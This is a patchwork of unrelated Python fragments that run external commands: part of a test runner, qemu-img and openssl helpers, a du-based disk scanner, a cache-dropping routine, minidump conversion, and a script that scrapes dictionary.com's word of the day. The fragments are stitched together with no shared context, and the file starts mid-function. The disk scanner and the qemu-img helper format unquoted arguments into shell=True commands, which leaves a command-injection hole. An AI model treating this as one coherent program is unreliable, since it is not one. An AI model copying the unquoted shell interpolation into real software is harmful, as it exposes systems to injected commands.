        print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir))

    tests_dir = src_dir + '/test/functional/'

    flags = ['--cachedir={}'.format(cache_dir)] + args

    if enable_coverage:
        coverage = RPCCoverage()
        flags.append(coverage.flag)
        logging.debug("Initializing coverage directory at %s" % coverage.dir)
    else:
        coverage = None

    if len(test_list) > 1 and jobs > 1:
        # Populate cache
        try:
            subprocess.check_output([sys.executable, tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir])
        except subprocess.CalledProcessError as e:
            sys.stdout.buffer.write(e.output)
            raise

    #Run Tests
    job_queue = TestHandler(
        num_tests_parallel=jobs,
        tests_dir=tests_dir,
        tmpdir=tmpdir,
        test_list=test_list,
        flags=flags,
        use_term_control=use_term_control,
    )
    start_time = time.time()
    test_results = []

    max_len_name = len(max(test_list, key=len))
    test_count = len(test_list)
    for i in range(test_count):
        test_result, testdir, stdout, stderr = job_queue.get_next()
        test_results.append(test_result)
        done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0])
        if test_result.status == "Passed":
            logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time))
        elif test_result.status == "Skipped":
            logging.debug("%s skipped" % (done_str))
        else:
            print("%s failed, Duration: %s s\n" % (done_str, test_result.time))
            print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n')
            print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
            if combined_logs_len and os.path.isdir(testdir):
                # Print the final `combinedlogslen` lines of the combined logs
                print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0]))
                print('\n============')
                print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
                print('============\n')
                combined_logs_args = [sys.executable, os.path.join(tests_dir, 'combine_logs.py'), testdir]
                if BOLD[0]:
                    combined_logs_args += ['--color']
                combined_logs, _ = subprocess.Popen(combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate()
                print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))

            if failfast:
                logging.debug("Early exiting after test failure")
                break

    print_results(test_results, max_len_name, (int(time.time() - start_time)))

    if coverage:
        coverage_passed = coverage.report_rpc_coverage()
        logging.debug("Cleaning up coverage data")
        coverage.cleanup()
    else:
        coverage_passed = True

    # Clear up the temp directory if all subdirectories are gone
    if not os.listdir(tmpdir):
        os.rmdir(tmpdir)

    all_passed = all(map(lambda test_result: test_result.was_successful, test_results)) and coverage_passed

    # This will be a no-op unless failfast is True in which case there may be dangling
    # processes which need to be killed.
    job_queue.kill_and_join()

    sys.exit(not all_passed)
def _create_qcow2(capacity, virtual_name):
    """Create /opt/os-tests/images/<virtual_name>.qcow2 of *capacity* GiB.

    Runs qemu-img through the shell and blocks until it finishes.
    """
    image_cmd = 'qemu-img create -f qcow2 /opt/os-tests/images/{virtual_name}.qcow2 {capacity}G'.format(
        virtual_name=virtual_name, capacity=capacity)
    image_proc = subprocess.Popen(image_cmd, shell=True)
    image_proc.wait()
def __init__(self):
    # Keep one long-lived c++filt process around: mangled symbol names are
    # written to its stdin and the demangled names read back from stdout.
    # NOTE(review): CPPFILT_CMD is defined elsewhere in the module.
    self.proc = subprocess.Popen(CPPFILT_CMD,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE)
def get_args():
    """Return the directory to scan: argv[1] if supplied, else the default root."""
    args = sys.argv
    def_path = get_root()
    if len(args) <= 1:
        print('\n'
              'No arguments provided \n'
              'Will use default args ...')
    else:
        def_path = args[1]
    print("Dir: {}".format(def_path))
    return def_path


if __name__ == '__main__':
    print(message())
    path = get_args()
    # Shell pipeline: the five largest entries (human-readable) under *path*.
    cmd = 'du -ahx {path} | sort -rh | head -5'.format_map({'path': path})
    print('\nStarting scanning ...\n')
    output = subprocess.Popen(cmd, shell=True,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE)
    stdout, stderr = output.communicate()
    for line in stdout.splitlines():
        print(line.decode('UTF-8'))
def clean_sys_state():
    #clear the caches
    # BUG FIX: the previous list form ["echo", "3", ">", "/proc/sys/vm/drop_caches"]
    # did not go through a shell, so ">" was passed to echo as a literal
    # argument and the caches were never actually dropped.  Run through a
    # shell so the redirection takes effect (requires root privileges).
    cmd = "echo 3 > /proc/sys/vm/drop_caches"
    process = subprocess.Popen(cmd, shell=True,
                               stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    assert process.wait() == 0, "failed to run %s" % str(cmd)
# Sign the server certificate with the local root CA, verify it, then have a
# node helper generate the client key pair.  (Python 2 script; run_p and log
# are project helpers defined elsewhere.)
log('Generating signed certificate for server.')
run_p('openssl req -new -config conf/server.cnf -passin stdin -key data/server.key -out data/server.csr',
      [SERVER_KEY_PASSWORD])
run_p('openssl x509 -req -days 365 -passin stdin -in data/server.csr -CA data/rootCA.pem '
      '-CAkey data/rootCA.key -CAcreateserial -out data/server.crt',
      [CA_KEY_PASSWORD])
log('Verify certificate properly signed.')
run_p('openssl verify -CAfile data/rootCA.pem data/server.crt')

# Run the node helper from the script's own directory.
SCRIPT_DIR = os.path.realpath(os.path.dirname(sys.argv[0]))
os.chdir(SCRIPT_DIR)
p = subprocess.Popen(['node', './gen_client_keys.js'],
                     stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(CLIENT_KEY_PASSWORD)
p.stdin.write('\n')
client_keys = json.load(p.stdout)
p.communicate()
if p.returncode != 0:
    # BUG FIX: this read `p.returncod` (missing 'e'), which raised
    # AttributeError on the very path meant to report the failure.
    print >>sys.stderr, 'generation of client key pair failed; return code', p.returncode

with open('data/client_sec_key', 'wb') as f_sec:
    f_sec.write(client_keys['sec'])
    f_sec.write('\n')
with open('data/client_pub_key', 'wb') as f_pub:
    f_pub.write(client_keys['pub'])
    f_pub.write('\n')
def dmp_to_core(self, dmp_path):
    """Convert the minidump at *dmp_path* to a core file and return its path.

    FIX: the output file handle was never closed and the converter process
    was never waited on, so the handle leaked and callers could read a
    partially written core file.  The conversion now completes before the
    path is returned.
    """
    f_core = dmp_path + '.core'
    with open(f_core, 'w') as f:
        converter = subprocess.Popen([MD_PATH + "/minidump-2-core", dmp_path],
                                     stdout=f)
        converter.wait()
    return f_core
# Day, and timer for creative writing. Text me a reminder
import requests, bs4, os, subprocess, webbrowser, textme, time, random

# Change directory to writing folder
os.chdir(r'D:\DOCUMENTS\Songs\Object writing')

# Request URL for dictionary.com word of the day
url = 'http://www.dictionary.com/wordoftheday/'
res = requests.get(url)
res.raise_for_status()

# Find word of the day in html
soup = bs4.BeautifulSoup(res.text, 'html.parser')
word = soup.find('strong').text

# Create text file named after the word, with the word at the top.
# FIX: the handle was opened/closed manually into a variable named `file`
# (shadowing a builtin); a context manager guarantees the close even on error.
with open(word + '.txt', 'a') as note:
    note.write(word + '\n\n')

# Text me for reminder
textme.textme('Time to write!')

# After text, wait 15 seconds, then open text file, website for word definition, then timer
time.sleep(15)
subprocess.Popen(
    ['C:\\Program Files (x86)\\Notepad++\\notepad++.exe', f'{word}.txt'])
webbrowser.open('http://www.dictionary.com/wordoftheday/')
webbrowser.open('https://www.online-stopwatch.com/timer/10minutes/')